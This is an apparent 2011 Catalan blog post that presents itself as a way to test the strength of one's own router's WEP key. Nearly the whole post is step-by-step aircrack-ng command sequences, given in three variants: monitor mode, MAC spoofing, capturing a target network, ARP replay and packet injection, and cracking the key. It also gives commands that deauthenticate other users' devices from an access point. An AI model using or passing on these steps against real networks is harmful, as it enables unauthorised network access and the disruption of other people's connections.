El Blog de Vinsentvega ;)

Un blog de tot un poc

Seguretat WEP compromesa

Posted by VinsentVega a 11 Octubre 2011


Si volem comprovar la seguretat que ens proporciona la clau WEP del nostre router, podem seguir una sèrie de passos per comprovar quan forta és i saber el temps que costaria rebentar-la.

Permisos superusuari: sudo su
Posar targeta en modo Monitor: airmon-ng start wlan0
Deshabilitar targeta: ifconfig mon0 down
Canviem la MAC: macchanger -m 55:44:33:22:11:00 mon0
Habilitar targeta: ifconfig mon0 up
Vore totes les xarxes: airodump-ng mon0
Fixar la xarxa a atacar: airodump -c $CANAL -w NOM_FITXER –bssid $BSSID mon0   ———–>NO TANCAR SHELL
S’associem a la xarxa: aireplay-ng -1 0 -a $BSSID -h 55:44:33:22:11:00 -e $ESSID mon0
Enviem paquets al PA: aireplay-ng -3 -b $BSSID -h 55:44:33:22:11:00 mon0            ———–>NO TANCAR SHELL
Averigüem contrasenya: aircrack-ng -n 64 -b $BSSID NOM_FITXER-01.cap

Desautenticar: aireplay-ng –deauth 20 -a $BSSID -c $MAC_PC_DESAUTENTICAR ath0
El 20 és el número de trames de desautentificació que s’envien

 

o també:
aireplay-ng -0 200 -a $BSSID -c $MAC_PC_DESAUTENTICAR mon0

——————————————-També podem fer-ho d’aquesta manera:——————————————-

 

airmon-ng start wlan0

airodump-ng mon0           ó                       airodump-ng -c6 mon0

airodump –bssid $BSSID -c$CANAL -w NOM_FITXER mon0                        ———–>NO TANCAR SHELL

aireplay-ng -e $ESSID -a $BSSID -h 55:44:33:22:11:00 -1 30  mon0         ———–>NO TANCAR SHELL

aireplay-ng -b $BSSID -h 55:44:33:22:11:00 -3 mon0                               ———–>NO TANCAR SHELL

aircrack-ng -z NOM_FITXER-01.cap

 

——————————————-També podem fer-ho d’aquesta manera:——————————————-

 

airodump –channel $CANAL –bssid $BSSID -w NOM_FITXER  mon0   ———–>NO TANCAR SHELL

Associar-se: aireplay-ng -1 0 -a $BSSID -h 55:44:33:22:11:00 -e $ESSID mon0———–>NO TANCAR SHELL

ARP-Request Replay: aireplay-ng -3 -a $BSSID -h 55:44:33:22:11:00 -e $ESSID mon0———–>NO TANCAR SHELL

Inyectar tràfic: aireplay-ng -2 -a $BSSID -h  55:44:33:22:11:00 -r NOM_FITXER-01.cap mon0———–>NO TANCAR SHELL

aircrack-ng -a 1 -e $ESSID -b $BSSID NOM_FITXER-01.cap

“-a 1” significa que estem desxifrant una WEP, per a WPA posaríem: “-a 2”

Anuncis

2 Respostes to “Seguretat WEP compromesa”

  1. ManuC said

    Buen tutorial vinsentvega.

    Saludos.

Deixa un comentari

Fill in your details below or click an icon to log in:

WordPress.com Logo

Esteu comentant fent servir el compte WordPress.com. Log Out / Canvia )

Twitter picture

Esteu comentant fent servir el compte Twitter. Log Out / Canvia )

Facebook photo

Esteu comentant fent servir el compte Facebook. Log Out / Canvia )

Google+ photo

Esteu comentant fent servir el compte Google+. Log Out / Canvia )

Connecting to %s

 
%d bloggers like this: